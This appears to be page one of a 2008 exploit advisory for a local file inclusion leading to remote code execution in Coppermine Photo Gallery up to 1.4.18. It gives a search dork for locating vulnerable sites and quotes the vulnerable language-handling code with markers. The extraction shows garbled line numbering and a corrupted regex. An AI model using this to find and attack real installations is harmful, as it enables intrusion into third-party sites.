1 <?php
2
3 /*
4
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
5
Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit
6
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
7
8
author...: EgiX
9
mail.....: n0b0d13s[at]gmail[dot]com
10
11
link.....: http://coppermine−gallery.net/
12
dork.....: "Powered by Coppermine Photo Gallery"
13
14
[−] vulnerable code to LFI in /include/init.inc.php
15
16
263.
// Start output buffering
17
264.
ob_start(’cpg_filter_page_html’);
18
265.
19
266.
// Parse cookie stored user profile
20
267.
user_get_profile(); <==== [1]
21
268.
22
269.
// Authenticate
23
270.
$cpg_udb−>authenticate();
24
25
[...]
26
27
301.
// Process language selection if present in URI or in user profile or try
28
302.
// autodetection if default charset is utf−8
29
303.
if (!empty($_GET[’lang’]))
30
304.
{
31
305.
$USER[’lang’] = ereg("^[a−z0−9_−]*__DOCTEXT__quot;, $_GET[’lang’]) ? $_GET[’lang’] : $CONFIG[’lang’];
32
306.
}
33
307.
34
308.
if (isset($USER[’lang’]) && !strstr($USER[’lang’], ’/’) && file_exists(’lang/’ . $USER[’lang’] . ’.ph
p’))
35
309.
{
36
310.
$CONFIG[’default_lang’] = $CONFIG[’lang’]; // Save default language
37
311.
$CONFIG[’lang’] = strtr($USER[’lang’], ’$/\\:*?"\’<>|‘’, ’____________’);
38
312.
}
39
313.
elseif ($CONFIG[’charset’] == ’utf−8’) <====== [2]
40
314.
{
41
315.
include(’include/select_lang.inc.php’);
42
316.
if (file_exists(’lang/’ . $USER[’lang’] . ’.php’))
43
317.
{
44
318.
$CONFIG[’default_lang’] = $CONFIG[’lang’]; // Save default language
45
319.
$CONFIG[’lang’] = $USER[’lang’];
46
320.
}
47
321.
}
48
322.
else
49
323.
{
50
324.
unset($USER[’lang’]);
51
325.
}
Page 1/5
Coppermine Photo Gallery 1.4.18 LFI Remote Code Execution Exploit
EgiX
07/31/2008
52
326.
53
327.
if (isset($CONFIG[’default_lang’]) && ($CONFIG[’default_lang’]==$CONFIG[’lang’]))
54
328.
{
55
329.
unset($CONFIG[’default_lang’]);
56
330.
}